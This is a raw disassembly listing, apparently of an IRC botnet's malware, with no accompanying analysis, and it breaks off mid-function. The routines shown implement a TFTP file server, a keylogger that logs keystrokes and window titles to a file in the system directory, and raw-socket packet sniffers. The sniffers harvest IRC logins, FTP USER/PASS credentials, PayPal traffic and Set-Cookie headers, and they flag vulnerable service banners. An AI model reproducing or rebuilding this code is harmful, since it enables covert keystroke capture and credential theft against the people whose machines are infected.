[ebp+var_168] call sub_40B413 add esp, 1Ch push ebx call dword_4270CC ; ExitThread loc_411927: ; CODE XREF: sub_411797+142j ; sub_411797+42Bj mov edi, [ebp+arg_0] cmp [edi+2A0h], ebx jz loc_411BCB mov edi, 80h lea eax, [ebp+var_D0] push edi push ebx push eax mov [ebp+var_1C], 5 mov [ebp+var_18], 1388h mov [ebp+var_878], esi mov [ebp+var_87C], 1 call sub_41B590 add esp, 0Ch lea eax, [ebp+var_1C] push eax push ebx lea eax, [ebp+var_87C] push ebx push eax push ebx call ds:dword_4CB63C ; select test eax, eax jle loc_411BBF mov al, byte_43D808 mov ecx, edi mov [ebp+var_578], al xor eax, eax lea edi, [ebp+var_577] mov [ebp+var_C], 10h rep stosd stosw stosb lea eax, [ebp+var_C] push eax lea eax, [ebp+var_3C] push eax push ebx lea eax, [ebp+var_D0] push 80h push eax push esi call ds:dword_4CB62C ; recvfrom push [ebp+var_38] mov [ebp+var_8], eax call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [ebp+var_50] push eax call sub_41B886 cmp [ebp+var_D0], bl pop ecx pop ecx jnz loc_411BA9 cmp [ebp+var_CF], 1 jnz loc_411AAF lea eax, [ebp+var_26C] push eax call sub_41AFE0 push ebx push ebx push [ebp+var_4] call sub_41D1EC push [ebp+var_4] lea eax, [ebp+var_574] mov [ebp+var_578], bl mov [ebp+var_577], 3 push 200h push 1 push eax mov [ebp+var_576], bl mov [ebp+var_575], 1 call sub_41B11A add esp, 20h lea ecx, [ebp+var_3C] mov [ebp+var_8], eax add eax, 4 push [ebp+var_C] push ecx push ebx push eax lea eax, [ebp+var_578] push eax push esi call ds:dword_4CB6B8 ; sendto lea eax, [ebp+var_50] push eax lea eax, [ebp+var_778] push offset aTftpTransferSt ; "Tftp transfer started to: %s" push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_D8], ebx jnz short loc_411A9D push ebx lea eax, [ebp+var_778] push [ebp+var_DC] push eax lea eax, [ebp+var_15C] push eax push [ebp+var_374] call sub_409A73 add esp, 14h loc_411A9D: ; CODE XREF: sub_411797+2E1j lea eax, [ebp+var_778] push eax call sub_4151AD pop ecx jmp loc_411BBF ; --------------------------------------------------------------------------- loc_411AAF: ; CODE XREF: sub_411797+257j cmp [ebp+var_CF], 4 jnz loc_411BA9 mov cl, [ebp+var_CD] mov al, [ebp+var_CE] cmp cl, 0FFh mov [ebp+var_578], bl mov [ebp+var_577], 3 jnz short loc_411AEC inc al xor cl, cl mov [ebp+var_576], al mov [ebp+var_575], bl jmp short loc_411AFA ; --------------------------------------------------------------------------- loc_411AEC: ; CODE XREF: sub_411797+341j inc cl mov [ebp+var_576], al mov [ebp+var_575], cl loc_411AFA: ; CODE XREF: sub_411797+353j movzx eax, al movzx ecx, cl shl eax, 8 add eax, ecx mov edi, 200h shl eax, 9 sub eax, edi push ebx push eax push [ebp+var_4] call sub_41D1EC push [ebp+var_4] lea eax, [ebp+var_574] push edi push 1 push eax call sub_41B11A add esp, 1Ch mov edi, eax lea eax, [ebp+var_3C] mov [ebp+var_8], edi push [ebp+var_C] push eax lea eax, [edi+4] push ebx push eax lea eax, [ebp+var_578] push eax push esi call ds:dword_4CB6B8 ; sendto cmp edi, ebx jnz short loc_411BBF lea eax, [ebp+var_50] push eax lea eax, [ebp+var_778] push offset aTftpTransferCo ; "Tftp transfer complete to: %s" push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_D8], ebx jnz short loc_411B94 push ebx lea eax, [ebp+var_778] push [ebp+var_DC] push eax lea eax, [ebp+var_15C] push eax push [ebp+var_374] call sub_409A73 add esp, 14h loc_411B94: ; CODE XREF: sub_411797+3D8j lea eax, [ebp+var_778] push eax call sub_4151AD inc ds:dword_4CE15C pop ecx jmp short loc_411BBF ; --------------------------------------------------------------------------- loc_411BA9: ; CODE XREF: sub_411797+24Aj ; sub_411797+31Fj push [ebp+var_C] lea eax, [ebp+var_3C] push eax push ebx push 9 push offset dword_434D60 push esi call ds:dword_4CB6B8 ; sendto loc_411BBF: ; CODE XREF: sub_411797+1E9j ; sub_411797+313j ... cmp [ebp+var_8], ebx jg loc_411927 mov edi, [ebp+arg_0] loc_411BCB: ; CODE XREF: sub_411797+199j push esi call ds:dword_4CB6EC ; closesocket push [ebp+var_4] call sub_41B05B dec [ebp+var_164] cmp [edi+2A0h], ebx pop ecx jnz short loc_411BFC push [ebp+var_168] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_411BFC: ; CODE XREF: sub_411797+450j push 3E8h call dword_427078 ; Sleep push edi loc_411C08: ; CODE XREF: sub_411797+125j call sub_411797 pop edi pop esi pop ebx leave retn 4 sub_411797 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_411C14 proc near ; CODE XREF: sub_411CF5+B4p ; sub_411CF5+253p var_314 = byte ptr -314h var_114 = byte ptr -114h var_10 = word ptr -10h var_E = word ptr -0Eh var_A = word ptr -0Ah var_8 = word ptr -8 var_6 = word ptr -6 var_4 = word ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_C = byte ptr 14h arg_8C = dword ptr 94h arg_90 = dword ptr 98h push ebp mov ebp, esp sub esp, 314h lea eax, [ebp+var_10] push esi push eax call dword_42712C ; GetLocalTime lea eax, [ebp+var_114] push 104h push eax call dword_427074 ; GetSystemDirectoryA lea eax, [ebp+var_114] push offset asc_43554C ; "\\" push eax call sub_41BEC0 lea eax, [ebp+var_114] push offset dword_429120 push eax call sub_41BEC0 lea eax, [ebp+var_114] push offset aAb ; "ab" push eax call sub_41B4C2 mov esi, eax add esp, 18h test esi, esi jnz short loc_411C7B push 1 pop eax jmp short loc_411CF2 ; --------------------------------------------------------------------------- loc_411C7B: ; CODE XREF: sub_411C14+60j movzx eax, [ebp+var_4] push [ebp+arg_0] push eax movzx eax, [ebp+var_6] push eax movzx eax, [ebp+var_8] push eax movzx eax, [ebp+var_10] push eax movzx eax, [ebp+var_A] push eax movzx eax, [ebp+var_E] push eax push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n" push esi call sub_41BE06 push esi call sub_41B05B add esp, 28h cmp [ebp+arg_90], 0 jnz short loc_411CF0 push [ebp+arg_0] lea eax, [ebp+var_314] push offset dword_43551C push 200h push eax call sub_41B980 push 0 lea eax, [ebp+var_314] push [ebp+arg_8C] push eax lea eax, [ebp+arg_C] push eax push [ebp+arg_4] call sub_409A73 add esp, 24h loc_411CF0: ; CODE XREF: sub_411C14+A3j xor eax, eax loc_411CF2: ; CODE XREF: sub_411C14+65j pop esi leave retn sub_411C14 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_411CF5 proc near ; DATA XREF: sub_401ACD+4509o var_8DC = dword ptr -8DCh var_8D8 = byte ptr -8D8h var_4DC = byte ptr -4DCh var_2DD = byte ptr -2DDh var_2DC = byte ptr -2DCh var_DC = byte ptr -0DCh var_D8 = dword ptr -0D8h var_48 = byte ptr -48h var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 8DCh mov eax, [ebp+arg_0] push ebx push esi push edi and [ebp+var_8DC], 0 push 25h and [ebp+var_4], 0 pop ecx mov esi, eax lea edi, [ebp+var_DC] rep movsd mov dword ptr [eax+90h], 1 mov ecx, 0FFh xor eax, eax lea edi, [ebp+var_8D8] rep stosd call ds:dword_4CB5D8 ; GetForegroundWindow lea ecx, [ebp+var_48] push 3Ch push ecx push eax mov [ebp+var_8], eax call ds:dword_4CB5F0 ; GetWindowTextA mov ebx, 200h loc_411D50: ; CODE XREF: sub_411CF5+2C7j push 8 call dword_427078 ; Sleep call ds:dword_4CB5D8 ; GetForegroundWindow cmp eax, [ebp+var_8] jz short loc_411DD8 lea ecx, [ebp+var_48] push 3Ch push ecx push eax mov [ebp+var_8], eax call ds:dword_4CB5F0 ; GetWindowTextA lea eax, [ebp+var_48] push eax lea eax, [ebp+var_2DC] push eax lea eax, [ebp+var_4DC] push offset aSChangedWindow ; "%s (Changed Windows: %s)" push eax call sub_41B886 sub esp, 84h lea esi, [ebp+var_DC] lea eax, [ebp+var_4DC] push 25h pop ecx mov edi, esp push eax rep movsd call sub_411C14 mov [ebp+var_4], eax push ebx lea eax, [ebp+var_2DC] push 0 push eax call sub_41B590 add esp, 0A4h lea eax, [ebp+var_4DC] push ebx push 0 push eax call sub_41B590 add esp, 0Ch loc_411DD8: ; CODE XREF: sub_411CF5+6Cj mov [ebp+arg_0], offset aB ; "b" loc_411DDF: ; CODE XREF: sub_411CF5+2BDj push 10h call ds:dword_4CB528 ; GetKeyState movsx esi, ax mov eax, [ebp+arg_0] mov edi, [eax-4] push edi call ds:dword_4CB620 ; GetAsyncKeyState test ah, 80h jz short loc_411E77 push 14h call ds:dword_4CB528 ; GetKeyState test ax, ax jz short loc_411E28 cmp esi, 0FFFFFFFFh jle short loc_411E28 cmp edi, 40h jle short loc_411E28 cmp edi, 5Bh jge short loc_411E28 mov [ebp+edi*4+var_8DC], 1 jmp loc_411FA7 ; --------------------------------------------------------------------------- loc_411E28: ; CODE XREF: sub_411CF5+112j ; sub_411CF5+117j ... push 14h call ds:dword_4CB528 ; GetKeyState test ax, ax jz short loc_411E53 test esi, esi jge short loc_411E67 cmp edi, 40h jle short loc_411E53 cmp edi, 5Bh jge short loc_411E53 mov [ebp+edi*4+var_8DC], 2 jmp loc_411FA7 ; --------------------------------------------------------------------------- loc_411E53: ; CODE XREF: sub_411CF5+13Ej ; sub_411CF5+147j ... test esi, esi jge short loc_411E67 mov [ebp+edi*4+var_8DC], 3 jmp loc_411FA7 ; --------------------------------------------------------------------------- loc_411E67: ; CODE XREF: sub_411CF5+142j ; sub_411CF5+160j mov [ebp+edi*4+var_8DC], 4 jmp loc_411FA7 ; --------------------------------------------------------------------------- loc_411E77: ; CODE XREF: sub_411CF5+105j mov esi, [ebp+edi*4+var_8DC] lea eax, [ebp+edi*4+var_8DC] test esi, esi jz loc_411FA7 and dword ptr [eax], 0 lea eax, [ebp+var_2DC] cmp edi, 8 push eax jnz short loc_411EAF call sub_41AFE0 and [ebp+eax+var_2DD], 0 pop ecx jmp loc_411FA7 ; --------------------------------------------------------------------------- loc_411EAF: ; CODE XREF: sub_411CF5+1A5j call sub_41AFE0 cmp eax, 1B9h pop ecx jbe short loc_411EE1 call ds:dword_4CB5D8 ; GetForegroundWindow lea ecx, [ebp+var_48] push 3Ch push ecx push eax call ds:dword_4CB5F0 ; GetWindowTextA lea eax, [ebp+var_48] push eax lea eax, [ebp+var_2DC] push eax push offset aSBufferFullS ; "%s (Buffer full) (%s)" jmp short loc_411F22 ; --------------------------------------------------------------------------- loc_411EE1: ; CODE XREF: sub_411CF5+1C5j cmp edi, 0Dh jnz loc_411F79 lea eax, [ebp+var_2DC] push eax call sub_41AFE0 test eax, eax pop ecx jz loc_411FA7 call ds:dword_4CB5D8 ; GetForegroundWindow lea ecx, [ebp+var_48] push 3Ch push ecx push eax call ds:dword_4CB5F0 ; GetWindowTextA lea eax, [ebp+var_48] push eax lea eax, [ebp+var_2DC] push eax push offset aSReturnS ; "%s (Return) (%s)" loc_411F22: ; CODE XREF: sub_411CF5+1EAj lea eax, [ebp+var_4DC] push eax call sub_41B886 sub esp, 84h lea esi, [ebp+var_DC] lea eax, [ebp+var_4DC] push 25h pop ecx mov edi, esp push eax rep movsd call sub_411C14 mov [ebp+var_4], eax push ebx lea eax, [ebp+var_2DC] push 0 push eax call sub_41B590 add esp, 0A4h lea eax, [ebp+var_4DC] push ebx push 0 push eax call sub_41B590 add esp, 0Ch jmp short loc_411FA7 ; --------------------------------------------------------------------------- loc_411F79: ; CODE XREF: sub_411CF5+1EFj cmp esi, 1 jz short loc_411F92 cmp esi, 3 jz short loc_411F92 cmp esi, 2 jz short loc_411F8D cmp esi, 4 jnz short loc_411FA7 loc_411F8D: ; CODE XREF: sub_411CF5+291j push [ebp+arg_0] jmp short loc_411F99 ; --------------------------------------------------------------------------- loc_411F92: ; CODE XREF: sub_411CF5+287j ; sub_411CF5+28Cj mov eax, [ebp+arg_0] add eax, 7 push eax loc_411F99: ; CODE XREF: sub_411CF5+29Bj lea eax, [ebp+var_2DC] push eax call sub_41BEC0 pop ecx pop ecx loc_411FA7: ; CODE XREF: sub_411CF5+12Ej ; sub_411CF5+159j ... add [ebp+arg_0], 14h cmp [ebp+arg_0], offset dword_4354E4 jl loc_411DDF cmp [ebp+var_4], 0 jz loc_411D50 push [ebp+var_D8] call sub_40B413 pop ecx push 0 call dword_4270CC ; ExitThread sub_411CF5 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_411FD6 proc near ; DATA XREF: sub_401ACD+412Bo var_102B4 = byte ptr -102B4h var_102AB = byte ptr -102ABh var_102A8 = dword ptr -102A8h var_102A0 = dword ptr -102A0h var_10293 = byte ptr -10293h var_1028C = byte ptr -1028Ch var_2B4 = byte ptr -2B4h var_B4 = dword ptr -0B4h var_B0 = byte ptr -0B0h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_20 = byte ptr -20h var_1C = word ptr -1Ch var_1A = word ptr -1Ah var_18 = dword ptr -18h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 102B4h call sub_41BB20 mov edx, [ebp+arg_0] push esi push edi push 1 pop eax mov esi, edx push 25h lea edi, [ebp+var_B4] pop ecx mov [ebp+var_8], eax rep movsd mov [edx+90h], eax xor esi, esi push 10h lea eax, [ebp+var_1C] push esi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_1C], 2 push esi call ds:dword_4CB654 ; htons push [ebp+var_B4] mov [ebp+var_1A], ax call sub_40AC10 pop ecx push eax call ds:dword_4CB694 ; inet_addr push esi push 3 push 2 mov [ebp+var_18], eax call ds:dword_4CB6D4 ; socket mov edi, eax cmp edi, 0FFFFFFFFh mov [ebp+var_4], edi jnz short loc_4120AB call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_2B4] push offset dword_435EEC push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_28], esi jnz short loc_41208E push esi lea eax, [ebp+var_2B4] push [ebp+var_2C] push eax lea eax, [ebp+var_B0] push eax push [ebp+var_B4] call sub_409A73 add esp, 14h loc_41208E: ; CODE XREF: sub_411FD6+96j lea eax, [ebp+var_2B4] push eax call sub_4151AD push [ebp+var_30] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread loc_4120AB: ; CODE XREF: sub_411FD6+76j mov eax, [ebp+var_30] push 10h imul eax, 234h mov dword_43E59C[eax], edi lea eax, [ebp+var_1C] push eax push edi call ds:dword_4CB680 ; bind cmp eax, 0FFFFFFFFh jnz short loc_412130 call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_2B4] push offset dword_435EC0 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_28], esi jnz short loc_41210C push esi lea eax, [ebp+var_2B4] push [ebp+var_2C] push eax lea eax, [ebp+var_B0] push eax push [ebp+var_B4] call sub_409A73 add esp, 14h loc_41210C: ; CODE XREF: sub_411FD6+114j lea eax, [ebp+var_2B4] push eax call sub_4151AD pop ecx push edi call ds:dword_4CB6EC ; closesocket push [ebp+var_30] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread loc_412130: ; CODE XREF: sub_411FD6+F4j push esi lea eax, [ebp+var_20] push esi push eax push esi push esi lea eax, [ebp+var_8] push 4 push eax push 98000001h push edi call ds:dword_4CB600 ; WSAIoctl cmp eax, 0FFFFFFFFh jnz short loc_4121B3 call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_2B4] push offset dword_435E90 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_28], esi jnz short loc_41218F push esi lea eax, [ebp+var_2B4] push [ebp+var_2C] push eax lea eax, [ebp+var_B0] push eax push [ebp+var_B4] call sub_409A73 add esp, 14h loc_41218F: ; CODE XREF: sub_411FD6+197j lea eax, [ebp+var_2B4] push eax call sub_4151AD pop ecx push edi call ds:dword_4CB6EC ; closesocket push [ebp+var_30] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread loc_4121B3: ; CODE XREF: sub_411FD6+177j push ebx mov ebx, offset dword_4355A8 loc_4121B9: ; CODE XREF: sub_411FD6+21Bj ; sub_411FD6+22Dj ... mov edi, 0FFFFh lea eax, [ebp+var_102B4] push edi push esi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_102B4] push esi push edi push eax push [ebp+var_4] call ds:dword_4CB66C ; recv cmp eax, 0FFFFFFFFh jz loc_4122E6 cmp [ebp+var_102AB], 6 jnz short loc_4121B9 mov eax, [ebp+var_102A8] cmp [ebp+var_10293], 18h mov [ebp+var_C], eax jnz short loc_4121B9 lea eax, [ebp+var_1028C] push offset dword_435E84 push eax call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4121B9 lea eax, [ebp+var_1028C] push offset dword_435E74 push eax call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4121B9 mov eax, ebx xor edi, edi test eax, eax jz loc_4121B9 mov [ebp+arg_0], ebx loc_412242: ; CODE XREF: sub_411FD6+287j push eax lea eax, [ebp+var_1028C] push eax call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_412264 inc edi add [ebp+arg_0], 18h mov eax, [ebp+arg_0] jnz short loc_412242 jmp loc_4121B9 ; --------------------------------------------------------------------------- loc_412264: ; CODE XREF: sub_411FD6+27Dj lea eax, [ebp+var_1028C] push eax push [ebp+var_102A0] call ds:dword_4CB584 ; htons movzx eax, ax push eax push [ebp+var_C] call ds:dword_4CB6E0 ; inet_ntoa push eax lea eax, [edi+edi*2] mov eax, dword_4355BC[eax*8] push off_435598[eax*4] lea eax, [ebp+var_2B4] push offset dword_435E40 push 200h push eax call sub_41B980 add esp, 1Ch cmp [ebp+var_28], esi jnz short loc_4122D4 push esi lea eax, [ebp+var_2B4] push [ebp+var_2C] push eax lea eax, [ebp+var_B0] push eax push [ebp+var_B4] call sub_409A73 add esp, 14h loc_4122D4: ; CODE XREF: sub_411FD6+2DCj lea eax, [ebp+var_2B4] push eax call sub_4151AD pop ecx jmp loc_4121B9 ; --------------------------------------------------------------------------- loc_4122E6: ; CODE XREF: sub_411FD6+20Ej call ds:dword_4CB5E8 ; WSAGetLastError push eax push offset dword_435E14 lea eax, [ebp+var_2B4] push 200h push eax call sub_41B980 add esp, 10h cmp [ebp+var_28], esi pop ebx jnz short loc_41232C push esi lea eax, [ebp+var_2B4] push [ebp+var_2C] push eax lea eax, [ebp+var_B0] push eax push [ebp+var_B4] call sub_409A73 add esp, 14h loc_41232C: ; CODE XREF: sub_411FD6+334j lea eax, [ebp+var_2B4] push eax call sub_4151AD pop ecx push [ebp+var_4] call ds:dword_4CB6EC ; closesocket push [ebp+var_30] call sub_40B413 pop ecx push esi call dword_4270CC ; ExitThread sub_411FD6 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_412352 proc near ; CODE XREF: sub_412661+213p ; sub_412661+239p arg_0 = dword ptr 4 mov eax, [esp+arg_0] mov ds:dword_4CE3C0, eax mov eax, offset dword_4CE3C0 retn sub_412352 endp ; =============== S U B R O U T I N E ======================================= sub_412361 proc near ; CODE XREF: sub_412661+2BFp arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push offset aBotSniff ; "Bot sniff" push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_41237B loc_412377: ; CODE XREF: sub_412361+29j ; sub_412361+3Aj ... xor al, al pop esi retn ; --------------------------------------------------------------------------- loc_41237B: ; CODE XREF: sub_412361+14j push offset aFaak ; "#FAAK#" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_412377 push offset aPsniff_1 ; "[PSNIFF]:" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_412377 push offset aPsniff_0 ; "PSNIFF//" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_412377 push offset aJoin_0 ; "JOIN #" push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_4123C3 loc_4123BF: ; CODE XREF: sub_412361+71j ; sub_412361+82j ... mov al, 1 pop esi retn ; --------------------------------------------------------------------------- loc_4123C3: ; CODE XREF: sub_412361+5Cj push offset a302_0 ; "302 " push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4123BF push offset a366 ; "366 " push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4123BF push offset a_login_0 ; ":.login" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4123BF push offset aLogin_1 ; ":!login" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4123BF push offset aLogin_0 ; ":!Login" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4123BF push offset a_login ; ":.Login" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4123BF push offset a_ident ; ":.ident" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4123BF push offset aIdent_0 ; ":!ident" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz loc_4123BF push offset a_hashin ; ":.hashin" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz loc_4123BF push offset aHashin ; ":!hashin" push esi call sub_41B900 pop ecx test eax, eax pop ecx pop esi setnz al retn sub_412361 endp ; =============== S U B R O U T I N E ======================================= sub_412478 proc near ; CODE XREF: sub_412661+2F8p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push offset aIrcSniff ; "IRC sniff" push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_412492 loc_41248E: ; CODE XREF: sub_412478+29j xor al, al pop esi retn ; --------------------------------------------------------------------------- loc_412492: ; CODE XREF: sub_412478+14j push offset aFaak ; "#FAAK#" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_41248E push offset aOper_0 ; "OPER " push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_4124B8 loc_4124B4: ; CODE XREF: sub_412478+4Fj ; sub_412478+60j mov al, 1 pop esi retn ; --------------------------------------------------------------------------- loc_4124B8: ; CODE XREF: sub_412478+3Aj push offset aNick_1 ; "NICK " push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4124B4 push offset aOper ; "oper " push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4124B4 push offset aYouAreNowAnIrc ; "You are now an IRC Operator" push esi call sub_41B900 pop ecx test eax, eax pop ecx pop esi setnz al retn sub_412478 endp ; =============== S U B R O U T I N E ======================================= sub_4124EE proc near ; CODE XREF: sub_412661+32Ep arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push offset aFtpSniff ; "FTP sniff" push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_412508 loc_412504: ; CODE XREF: sub_4124EE+29j ; sub_4124EE+3Aj xor al, al pop esi retn ; --------------------------------------------------------------------------- loc_412508: ; CODE XREF: sub_4124EE+14j push offset aFaak ; "#FAAK#" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_412504 push offset aNick_1 ; "NICK " push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_412504 push offset a220 ; "220 " push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_41253F loc_41253B: ; CODE XREF: sub_4124EE+60j ; sub_4124EE+71j mov al, 1 pop esi retn ; --------------------------------------------------------------------------- loc_41253F: ; CODE XREF: sub_4124EE+4Bj push offset a230 ; "230 " push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_41253B push offset aUser_3 ; "USER " push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_41253B push offset aPass_1 ; "PASS " push esi call sub_41B900 pop ecx test eax, eax pop ecx pop esi setnz al retn sub_4124EE endp ; =============== S U B R O U T I N E ======================================= sub_412575 proc near ; CODE XREF: sub_412661+35Fp arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push offset aHttpSniff ; "HTTP sniff" push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_41258F loc_41258B: ; CODE XREF: sub_412575+29j xor al, al pop esi retn ; --------------------------------------------------------------------------- loc_41258F: ; CODE XREF: sub_412575+14j push offset aFaak ; "#FAAK#" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_41258B push offset aPaypal ; "paypal" push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_4125B5 loc_4125B1: ; CODE XREF: sub_412575+4Fj ; sub_412575+60j ... mov al, 1 pop esi retn ; --------------------------------------------------------------------------- loc_4125B5: ; CODE XREF: sub_412575+3Aj push offset aPaypal_0 ; "PAYPAL" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4125B1 push offset aPaypal_com_0 ; "PAYPAL.COM" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4125B1 push offset aPaypal_com ; "paypal.com" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_4125B1 push offset aSetCookie ; "Set-Cookie:" push esi call sub_41B900 pop ecx test eax, eax pop ecx pop esi setnz al retn sub_412575 endp ; =============== S U B R O U T I N E ======================================= sub_4125FC proc near ; CODE XREF: sub_412661:loc_412A26p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push offset aVulnSniff ; "VULN sniff" push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_412616 loc_412612: ; CODE XREF: sub_4125FC+29j xor al, al pop esi retn ; --------------------------------------------------------------------------- loc_412616: ; CODE XREF: sub_4125FC+14j push offset aFaak ; "#FAAK#" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_412612 push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6" push esi call sub_41B900 pop ecx test eax, eax pop ecx jz short loc_41263C loc_412638: ; CODE XREF: sub_4125FC+4Fj mov al, 1 pop esi retn ; --------------------------------------------------------------------------- loc_41263C: ; CODE XREF: sub_4125FC+3Aj push offset aServUFtpServer ; "Serv-U FTP Server" push esi call sub_41B900 pop ecx test eax, eax pop ecx jnz short loc_412638 push offset aOpenssh_2 ; "OpenSSH_2" push esi call sub_41B900 pop ecx test eax, eax pop ecx pop esi setnz al retn sub_4125FC endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_412661 proc near ; DATA XREF: sub_401ACD+427Do var_113B8 = byte ptr -113B8h var_113AF = byte ptr -113AFh var_113AC = dword ptr -113ACh var_113A8 = dword ptr -113A8h var_113A4 = dword ptr -113A4h var_1138C = byte ptr -1138Ch var_13B8 = byte ptr -13B8h var_BB8 = byte ptr -0BB8h var_3B8 = byte ptr -3B8h var_3B7 = byte ptr -3B7h var_2B8 = byte ptr -2B8h var_B8 = dword ptr -0B8h var_B4 = byte ptr -0B4h var_34 = dword ptr -34h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_24 = byte ptr -24h var_20 = word ptr -20h var_1E = word ptr -1Eh var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 113B8h call sub_41BB20 mov eax, [ebp+arg_0] push ebx push esi push edi push 25h mov esi, eax pop ecx lea edi, [ebp+var_B8] rep movsd push 1 xor ebx, ebx pop esi lea edi, [ebp+var_3B7] push 3Fh mov [eax+90h], esi pop ecx xor eax, eax mov [ebp+var_3B8], bl push 0FFh rep stosd stosw lea eax, [ebp+var_3B8] mov [ebp+var_20], 2 push eax mov [ebp+var_1E], bx mov [ebp+var_1C], ebx call ds:dword_4CB668 ; gethostname lea eax, [ebp+var_3B8] push eax call ds:dword_4CB6D8 ; gethostbyname movsx ecx, word ptr [eax+0Ah] mov eax, [eax+0Ch] push ecx push dword ptr [eax] lea eax, [ebp+var_8] push eax call sub_41C310 mov eax, [ebp+var_8] add esp, 0Ch mov [ebp+var_1C], eax push ebx push 3 push 2 call ds:dword_4CB6D4 ; socket mov edi, eax cmp edi, 0FFFFFFFFh mov [ebp+var_10], edi jnz short loc_412707 pop edi pop esi xor eax, eax pop ebx leave retn 4 ; --------------------------------------------------------------------------- loc_412707: ; CODE XREF: sub_412661+9Bj lea eax, [ebp+var_20] push 10h push eax push edi call ds:dword_4CB680 ; bind cmp eax, 0FFFFFFFFh jnz short loc_41277D call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_2B8] push offset unk_4361C0 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_2C], ebx jnz short loc_412759 push ebx lea eax, [ebp+var_2B8] push [ebp+var_30] push eax lea eax, [ebp+var_B4] push eax push [ebp+var_B8] call sub_409A73 add esp, 14h loc_412759: ; CODE XREF: sub_412661+D6j lea eax, [ebp+var_2B8] push eax call sub_4151AD pop ecx push edi call ds:dword_4CB6EC ; closesocket push [ebp+var_34] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_41277D: ; CODE XREF: sub_412661+B6j push ebx lea eax, [ebp+var_24] push ebx push eax push ebx push ebx lea eax, [ebp+var_C] push 4 push eax push 98000001h push edi mov [ebp+var_C], esi call ds:dword_4CB600 ; WSAIoctl cmp eax, 0FFFFFFFFh jnz short loc_412803 call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_2B8] push offset unk_436190 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_2C], ebx jnz short loc_4127DF push ebx lea eax, [ebp+var_2B8] push [ebp+var_30] push eax lea eax, [ebp+var_B4] push eax push [ebp+var_B8] call sub_409A73 add esp, 14h loc_4127DF: ; CODE XREF: 